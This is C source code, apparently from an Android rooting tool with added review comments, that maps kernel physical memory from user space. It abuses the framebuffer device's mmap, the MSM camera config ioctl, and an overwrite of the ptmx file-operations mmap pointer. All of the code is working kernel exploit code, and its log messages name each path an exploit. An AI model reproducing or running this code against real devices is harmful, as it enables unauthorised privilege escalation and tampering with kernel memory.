/**
 * Map physical memory through the framebuffer device node.
 *
 * Opens FB_DEVICE, queries its fixed screen info, and mmap()s the device at
 * file offset (kernel_phys_address + info.smem_len), i.e. starting just past
 * the framebuffer's own memory, for (0x100000000 - kernel_phys_address) bytes.
 * The mapping is pinned at MAPPED_BASE with MAP_FIXED.
 *
 * NOTE(review): this presumably relies on the fb driver's mmap handler not
 * bounding offset+length against smem_len; a driver that checks that range
 * would reject the request -- confirm against the target driver.
 *
 * Precondition: kernel_phys_offset_initialized, or
 * detect_kernel_phys_parameters() succeeds (it is only attempted when the
 * flag is clear).
 *
 * @param fd  Out parameter; receives the FB_DEVICE descriptor.  It is closed
 *            only when the FBIOGET_FSCREENINFO ioctl fails.  On success, and
 *            also when mmap() itself fails, *fd stays open and the caller
 *            owns it.
 * @return    The mmap() result, returned unchecked -- so MAP_FAILED may be
 *            the mapping failing while *fd is still open.  Contrast
 *            msm_cameraconfig_mmap, which closes and resets its descriptors
 *            on every failure path.  Also returns MAP_FAILED before touching
 *            *fd when the physical parameters cannot be determined.
 */
void *
fb_mem_mmap(int *fd)
{
  struct fb_fix_screeninfo info;
  void *mapped_address;

  /* Physical base is required to compute both the file offset and length. */
  if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
     ALOGI("This machine can not use fb_mem exploit.\n");
     return MAP_FAILED;
  }

  *fd = open(FB_DEVICE, O_RDWR);
  if (*fd < 0) {
    ALOGI("Failed to open " FB_DEVICE " due to %s\n", strerror(errno));
    return MAP_FAILED;
  }

  /* smem_len (size of the framebuffer memory) is the only field used below. */
  if (ioctl(*fd, FBIOGET_FSCREENINFO, (void *)&info) != 0) {
    ALOGI("Failed to get screen info due to %s\n", strerror(errno));
    close(*fd);

    return MAP_FAILED;
  }

  /*
   * Length spans from kernel_phys_address up to the 4 GiB boundary; the
   * offset skips over the framebuffer memory itself.  Nothing here checks
   * whether mmap() succeeded -- see the header comment.
   */
  mapped_address = mmap((void *)MAPPED_BASE, (0x100000000 - kernel_phys_address),
                        PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED,
                        *fd, kernel_phys_address + info.smem_len);


  return mapped_address;
}
/**
 * Map KERNEL_SIZE bytes of physical memory through the MSM camera config node.
 *
 * Opens /dev/video0 and /dev/msm_camera/config0, registers a memory-map
 * descriptor on the config node via MSM_CAM_IOCTL_SET_MEM_MAP_INFO
 * (cookie = kernel_phys_offset, length = KERNEL_SIZE, mem_type = MSM_MEM_MMAP),
 * then mmap()s the config descriptor at file offset kernel_phys_offset.
 * MAPPED_BASE is passed as a hint only (no MAP_FIXED here, unlike fb_mem_mmap).
 *
 * NOTE(review): /dev/video0 is opened but never used afterwards; presumably
 * the driver requires it to be held open before the config node accepts the
 * ioctl -- confirm.
 *
 * Precondition: kernel_phys_offset_initialized, or
 * detect_kernel_phys_parameters() succeeds.
 *
 * @param fd_video   Out parameter; receives the /dev/video0 descriptor.
 * @param fd_config  Out parameter; receives the /dev/msm_camera/config0
 *                   descriptor.
 *                   On any failure both descriptors are closed (when >= 0)
 *                   and reset to -1.  On success both stay open and the
 *                   caller owns them.
 *
 * NOTE(review): when open("/dev/video0") fails, error_exit inspects
 * *fd_config before this function has assigned it.  Callers must pass
 * *fd_config (and *fd_video) initialised to -1, otherwise a stray
 * descriptor could be closed.
 *
 * @return  The mapped address, or MAP_FAILED.  Diagnostics go to printf(),
 *          whereas fb_mem_mmap uses ALOGI(); the two are inconsistent.
 */
void *
msm_cameraconfig_mmap(int *fd_video, int *fd_config)
{
  struct msm_mem_map_info args;
  void *mapped_address;

  if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
     printf("This machine can not use msm_cameraconfig exploit.\n");
     return MAP_FAILED;
  }

  *fd_video = open("/dev/video0", O_RDWR);
  if (*fd_video < 0) {
    /* *fd_config has not been assigned yet at this point -- see header. */
    goto error_exit;
  }

  *fd_config = open("/dev/msm_camera/config0", O_RDWR);
  if (*fd_config < 0) {
    goto error_exit;
  }

  /* Describe the region the subsequent mmap() will ask for. */
  args.cookie = kernel_phys_offset;
  args.length = KERNEL_SIZE;
  args.mem_type = MSM_MEM_MMAP;

  if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) {
    goto error_exit;
  }

  /* Same offset/length as registered above; MAPPED_BASE is only a hint. */
  mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE, PROT_READ | PROT_WRITE,
                        MAP_SHARED, *fd_config, kernel_phys_offset);

  if (mapped_address == MAP_FAILED) {
    goto error_exit;
  }

  return mapped_address;

error_exit:
  /* Close whatever was opened and leave both descriptors at -1. */
  if (*fd_config >= 0) {
    close(*fd_config);
    *fd_config = -1;
  }

  if (*fd_video >= 0) {
    close(*fd_video);
    *fd_video = -1;
  }

  return MAP_FAILED;
}
/**
 * Run `callback` against a mapping of kernel memory.
 *
 * First delegates to run_exploit_mmap(); if that reports it handled the
 * request, its result is returned as-is.  Otherwise the ptmx-based path is
 * prepared: remap_pfn_range and the ptmx_fops mmap slot addresses are
 * resolved, the kernel physical offset is established, and attempt_exploit()
 * is invoked with ptmx_fops_mmap_address as the target, &ptmx_mmap as the
 * value, run_callback_with_mmap as the follow-up routine and `callback` as
 * its argument.
 *
 * NOTE(review): the semantics of attempt_exploit() (presumably: write the
 * given value at the given address, then run the routine) are not visible
 * here -- confirm against its definition.
 *
 * NOTE(review): the 0x00008000 subtracted from the device-table symbol
 * presumably converts a kernel text start address into the physical base;
 * confirm, and consider naming the constant.
 *
 * @param callback  Routine to run once the mapping is in place; passed
 *                  through to run_exploit_mmap() and run_callback_with_mmap.
 * @return  run_exploit_mmap()'s result when it handles the request
 *          (NOTE(review): `result` is only meaningful if run_exploit_mmap()
 *          assigns it whenever it returns true -- not visible here);
 *          false when any required address cannot be obtained; otherwise
 *          attempt_exploit()'s return value.
 */
bool
run_with_mmap(memory_callback_t callback)
{
  unsigned long int kernel_physical_offset;
  bool result;

  /* Preferred path; only fall through to the ptmx approach if it declines. */
  if (run_exploit_mmap(callback, &result)) {
    return result;
  }

  setup_remap_pfn_range_address();

  if (!remap_pfn_range) {
    printf("You need to manage to get remap_pfn_range addresses.\n");
    return false;
  }

  setup_ptmx_fops_mmap_address();
  if (!ptmx_fops_mmap_address) {
    printf("You need to manage to get ptmx_fops addresses.\n");
    return false;
  }

  /* Prefer the per-device table; fall back to runtime detection. */
  kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
  if (kernel_physical_offset) {
    set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
  }
  else if (!detect_kernel_phys_parameters()) {
    printf("You need to manage to get kernel_physical_offset addresses.\n");
    return false;
  }

  return attempt_exploit(ptmx_fops_mmap_address,
                         (unsigned long int)&ptmx_mmap, 0,
			 run_callback_with_mmap, callback);
}